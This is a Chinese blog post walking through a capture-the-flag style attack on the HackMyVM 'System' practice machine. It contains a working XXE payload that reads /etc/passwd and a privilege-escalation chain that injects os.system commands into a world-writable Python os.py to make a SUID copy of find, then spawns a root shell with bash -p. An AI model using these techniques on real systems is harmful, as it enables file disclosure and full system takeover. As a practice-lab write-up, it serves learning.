hackmyvm System 靶机练习(最玄学的拿root经历)

最新推荐文章于 2023-02-03 09:54:28 发布
最新推荐文章于 2023-02-03 09:54:28 发布
阅读量648 收藏 1
点赞数
分类专栏: hackmyvm 文章标签: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43623271/article/details/124205770
版权

主机发现

在这里插入图片描述

端口扫描

在这里插入图片描述

漏洞挖掘

访问web,发现是一个登录表单
在这里插入图片描述
打开burpsuite,抓包分析,发现请求体是xml格式,立马想到XXE
在这里插入图片描述
发送到Repeater模块进行测试,发现email那个位置可以利用,因为他在页面上有回显
在这里插入图片描述
我在请求体的XML引用了外部实体,结果发现程序启用了外部实体,也就是说这里真有XXE漏洞

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE ANY [
    <!ENTITY f SYSTEM "/etc/passwd">
]>
<details><email>&f;</email><password>12</password></details>

查看/etc/passwd文件,看有哪些可以登录的用户

在这里插入图片描述
将信息保存在一个文件中
在这里插入图片描述
在这里插入图片描述
筛选出可以登录的用户,david和root
在这里插入图片描述

这时候可以利用xxe枚举david家目录的文件
将刚刚的请求包发送的intruder模块,payload点为下图的地方
在这里插入图片描述
选择一个字典
这里推荐https://github.com/danielmiessler/SecLists
简直是字典天花板,什么类型的字典都有
这里跑完之后发现4个响应长度不一样的文件,说明xxe回显出内容了,其他长度都是无内容的
在这里插入图片描述
这里发现一个可疑文件.viminfo
在这里插入图片描述
发现一个密码,应该是david的登录密码
在这里插入图片描述

ssh david@192.168.31.57

在这里插入图片描述
成功登录到david

在这里插入图片描述
成功找出user flag

权限提升

按照国际惯例,先把kali上的linpeas脚本拉到靶机上运行
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

首先是这里,没有gcc,用不了DirtyPipe提权(我是不会弄)
在这里插入图片描述
第一和第三个exp在网上找资源也是要gcc编译,也无果
在这里插入图片描述
这里也没有特别可利用的SUID二进制文件
在这里插入图片描述

研究了一天,第二天直到我看到这里

在这里插入图片描述
os.py–others有可写功能,属主是root,那我们可不可以写入os.system()命令让root帮我们执行一些命令
在这里插入图片描述
有想法就去测试了

david@system:~$ vi /usr/lib/python3.9/os.py

我在文件的最底部插入了

import os
os.system('cp /usr/bin/find /tmp/find')
os.system('chmod u+s /tmp/find')

意思是复制系统自带的find命令到/tmp目录下,并加个SUID权限

SUID的功能:用户运行某程序时,如果此程序拥有SUID权限,那么程序运行为进程时,其进程的属主不是发起者,而是程序文件自己的属主

在这里插入图片描述
python3运行了一下,结果发现运行有错误,好像是权限不够
在这里插入图片描述
但是当我查看/tmp目录时,大吃一惊
在这里插入图片描述
这不是复制成功了吗??

不管那么多,先拿去测试一下

david@system:~$ /tmp/find /opt -exec whoami \;

在这里插入图片描述
whoami是root说明已经拿到root权限了

拿到一个交互的root

david@system:~$ /tmp/find /opt -exec /bin/bash -p \;
这里-p 是必加的,作用是以"suid"运行bash

在这里插入图片描述
如果不加-p,可以发现是david
在这里插入图片描述

拿到root权限之后,就是愉快的找root flag啦~
在这里插入图片描述

知识回顾

  1. XXE
  2. 枚举家目录文件
  3. 注意others有可写功能,属主是root的文件
  4. find的命令执行和root权限的交互shell

PS:这篇Writeup是全网System靶机的第一篇Writeup,没想到我也有今日…

活着Viva
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Hackmyvm综合靶机 | Driftingblues-7
IerkeU的博客
04-17 254
前言提要 有史以来最简单的一个靶机,话不多说直接搞
Hackmyvm综合靶机 | Driftingblues-4
IerkeU的博客
04-11 1817
Driftingblues-4靶机过程记录
dc-4靶机练习.docx
01-02
第一步;靶机在web信息收集,burp获取登陆用户名和密码。 第二步:利用反弹shell后发现一封邮件,拿到新用户的登陆口令。 第三步:通过sudo -l]发现不用登录root可以使用的命令 [teehee --help][teehee -a]增加用户,具有root权限
hack学习资料.zip
07-25
分享一套学习资料,里面所包含了基本工具、实验环境、信息收集、扫描以及Metasploit之类的教程和资源或者在线网站等等。
1-OSCP自学笔记-October靶机练习1
08-04
0、前言本教程为《OSCP自学笔记-靶机练习系列之一的《October靶机练习》,在这个系列中笔者将抽取10台典型靶机作为练习目标,以OSCP学习及考试的角度
HackMyvm靶机系列(7)-Tron
qq_70727026的博客
05-17 449
一、信息收集 如图,老方法,先来一波网段扫描,探测存活主机 nmap -sP 192.168.200.0/24 | grep -i -B 2 virtualbox 然后使用nmap扫描端口,探测开放的服务,这里发现目标主机开放了ssh服务和http服务 nmap -sC -sV -p- 192.168.200.168 访问目标的http服务,看到如下结果。 然后右键查看源代码,发现下面字符串,看上去像是账号和密码。 尝试使用下面密码登录目标主机,但是失败了。 kz.
HACK学习呀-内网渗透实践2
快吃小蛋糕吧的博客
04-10 1087
内网渗透-2 公众号上HACK学习呀上面的一篇内网渗透文章,收益颇多,本篇文章实验部分为自己重现 重现时遇到各式各样的奇葩问题,现均已解决 原文链接:https://mp.weixin.qq.com/s/UIGYJvfNAty7ywg3EBjTJw 靶场地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/6/ 本次靶场渗透包括反序列化漏洞、命令执行漏洞、Tomcat漏洞、MS系列漏洞、端口转发漏洞、以及域渗透等多种组合漏洞。 知识点 st漏洞利用 php
Hack the box -- 靶机渗透测试(TIER2)
wjishuxiaobai的博客
06-25 1555
本文针对Hack the box 靶机TIER2渗透过程进行记录。开启在线靶机靶机IP为10.129.88.20。端口扫描 扫描命令 sudo nmap -sC -sV 10.129.88.20, 发现1443端口开启了smb服务,所以尝试使用smbclient连接。smbclient连接 命令为:smbclient -N -L 10.129.88.20(-N表示无密码登录,-L可以查看服务器上可用服务) 通过查找发现在backups目录下存在一个配置文件prod.dtsConfig,将其下载本地进
hackmyvm入门(靶机网络配置)
Bu2n的博客
04-13 5983
hackmyvm概述hackmyvm靶机下载地址靶机网络配置测试环境环境搭建愉快玩耍 hackmyvm概述 hackmyvm是一个平台,包含了大量靶机,类似于vulnhub、hackthebox等平台,你可以在上面下载靶机,进行渗透测试练习,非常适合热爱黑客技术或从事渗透测试的人员。我个人觉得,hackmyvm相比vulnhub好的地方在于它的靶机所占磁盘空间小,hackmyvm靶机一般在1G左右,而vulnhub靶机动不动就2G,甚至我见过还有6G的。不扯这些了,今天是聊一聊hackmyvm到底怎么玩.
Hack The Box 系列域渗透之靶机Multimaster
二狗的博客
02-03 1199
本小白最近在学域渗透,决定把Hack The Box的Active Directory 101系列域渗透靶机打完,并详细记录当中用到的工具、知识点及其背后的原理。本篇文章是该系列的第九篇,靶机名字为Multimaster,这是一台疯狂难度的靶机
dc-2靶机练习.pdf
01-02
详细的靶机dc-2练习过程,思路明确,条例清晰, 通过修改hosts进入网站,发现flag1 通过cewl工具对网站生成密码字典,使用wpscan进行密码爆破得到jerry,tom账号密码,登录后台得到flag2 端口扫描发现ssh服务开...
靶机操作练习,earth 靶机实战练习
09-08
学习
渗透入门Mr-robott靶机练习.doc
07-09
一款入门级别靶机Mr-robot的练习思路
后端开发是一个涉及广泛技术和工具的领域.docx
04-30
后端开发是一个涉及广泛技术和工具的领域,这些资源对于构建健壮、可扩展和高效的Web应用程序至关重要。以下是对后端开发资源的简要介绍: 首先,掌握一门或多门编程语言是后端开发的基础。Java、Python和Node.js是其中最受欢迎的几种。Java以其跨平台性和丰富的库而著名,Python则因其简洁的语法和广泛的应用领域而备受欢迎。Node.js则通过其基于JavaScript的单线程异步I/O模型,为Web开发提供了高性能的解决方案。 其次,数据库技术是后端开发中不可或缺的一部分。关系型数据库(如MySQL、PostgreSQL)和非关系型数据库(如MongoDB、Redis)各有其特点和应用场景。关系型数据库适合存储结构化数据,而非关系型数据库则更适合处理大量非结构化数据。 此外,Web开发框架也是后端开发的重要资源。例如,Express是一个基于Node.js的Web应用开发框架,它提供了丰富的API和中间件支持,使得开发人员能够快速地构建Web应用程序。Django则是一个用Python编写的Web应用框架,它采用了MVC的软件设计模式,使得代码结构更加清晰和易于维护。
华为数字化转型实践28个精华问答glkm.pptx
04-30
华为数字化转型实践28个精华问答glkm.pptx
新员工入职培训全流程资料包gl.zip
04-30
新员工入职培训全流程资料包(100+个文件) 1入职流程指引 万科新职员入职通知书 万科新职员入职引导手册 新进员工跟进管理表 新员工入职报到工作单(文职) 新员工入职报到流程 新员工入职流程表 新员工入职手续办理流程(工厂 新员工入职手续清单 新员工入职须知 新员工入职训流程 新员工入职引导表(导师用) 2 入职工具表格 3 培训方案计划 4培训管理流程 5培训教材课件 6 培训效果检测 7 员工管理制度 8 劳动合同协议 9 新员工培训PPT模板(28套)
三菱PLC通讯程序实例
04-30
FX5U PLC作为主、从站的通讯方式程序实例,以及包含详细说明文件...
技术需求报告-集行波测距与故障录波功能于一体的电网综合故障分析系统.docx
最新发布
04-30
技术需求报告-集行波测距与故障录波功能于一体的电网综合故障分析系统.docx
最新二开版本源码博客论坛源码,UI很漂亮,可切换皮肤界面.rar
04-30
最新二开版本源码博客论坛源码,UI很漂亮,可切换皮肤界面.rar最新二开版本源码博客论坛源码,UI很漂亮,可切换皮肤界面.rar
doubletrouble靶机
08-29
doubletrouble靶机是一个用于渗透测试和漏洞挖掘的目标。它有两个不同的靶机地址。第一个地址是https://download.vulnhub.com/doubletrouble/doubletrouble.ova,可以下载一个ova文件来部署虚拟机。第二个地址是...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值